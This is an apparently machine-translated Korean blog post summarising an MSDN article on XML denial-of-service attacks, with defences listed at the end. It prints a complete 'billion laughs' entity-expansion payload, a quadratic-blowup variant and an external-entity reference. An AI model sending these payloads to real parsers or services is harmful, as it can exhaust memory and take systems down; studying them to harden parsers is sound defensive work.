XML DOS 공격

2693 단어 xml

내용 은 이 글 에서 나 왔 습 니 다:http://msdn.microsoft.com/en-us/magazine/ee335713.aspx
DoS (Denial of service: 서비스 거부) 공격 은 유래 가 깊다 (1992). SQL 주입 (1998), 크로스 오 버 스 크 립 트 (1995), CSRF (1994) 보다 빠르다.
DoS 공격 은 매우 간단 하고 효과 적 입 니 다.최초의 DoS 공격 은 TCP SYN 홍 범 공격 을 사 용 했 고 현대 의 서버 소프트 하드웨어 는 대부분 이런 공격 을 막 았 다.http://baike.baidu.com/link?url=v24lBbsdB0TjV1y6qwL1cF9cOygTGg9AesHna4S7PwOcwa7F7k2_Js07jqwfEQNgkGLSFMm3xpoAKz1o2thnHq http://blog.csdn.net/jiangzhengdong/article/details/8119223XML 기반 DoS 공격 과 같은 새로운 DoS 공격 이 응용 층 으로 바 뀌 었 습 니 다.
XML 폭탄 XML document type definition (DTD) 은 enity 를 정의 할 수 있 으 며, DTD 는 외부 파일 이나 파일 내부 에 나타 날 수 있 습 니 다.DTD 를 이용 하여 XML 폭탄 을 만 들 수 있 습 니 다. 즉, 대량의 메모 리 를 신속하게 사용 할 수 있 는 파일 입 니 다. 예 를 들 어 XML 해상도 기 가 이 파일 을 분석 하려 고 할 때 DTD 의 정의 지수 급 이 전개 되 기 때문에 이 1K 미 만 의 파일 은 3G 의 메모 리 를 차지 합 니 다.

<?xml version="1.0"?>

<!DOCTYPE lolz [

<!ENTITY lol "lol">

<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">

<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">

<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">

<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">

<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">

<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">

<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">

<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">

]>

<lolz>&lol9;</lolz>

또 하 나 는 확 장 률 이 그리 크 지 않 지만 효과 가 있다.200 K 는 2.5G 까지 확장 할 수 있 습 니 다.

<?xml version="1.0"?>

<!DOCTYPE kaboom [

<!ENTITY a "aaaaaaaaaaaaaaaaaa...">

]>

<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>

외부 실체 공격
DTD 도 외부 실체 링크 를 참조 할 수 있 습 니 다.

<!ENTITY stockprice SYSTEM "http://www.contoso.com/currentstockprice.ashx">

만약 이러한 실체 stockprice 를 만 나 영원히 돌아 오지 않 는 다 면 XML 해석 도 시간 을 초과 할 것 이다.하지만 더 좋 은 공격 은 무한 한 문자열 을 되 돌려 자원 을 소모 하 는 것 이다.
XML 폭탄 방어 DTD 금지
외부 실체 공격 방어 제한 개체 당 최대 길이 제한 시간 초과

이 내용에 흥미가 있습니까?

현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:

XML이란 무엇입니까?

이것은 저장, 검색 및 공유할 수 있는 형식으로 데이터를 저장하는 강력한 방법입니다. 가장 중요한 것은 XML의 기본 형식이 표준화되어 있기 때문에 시스템이나 플랫폼 간에 로컬 또는 인터넷을 통해 XML을 공유하거나...

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.

좋은 웹페이지 즐겨찾기

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다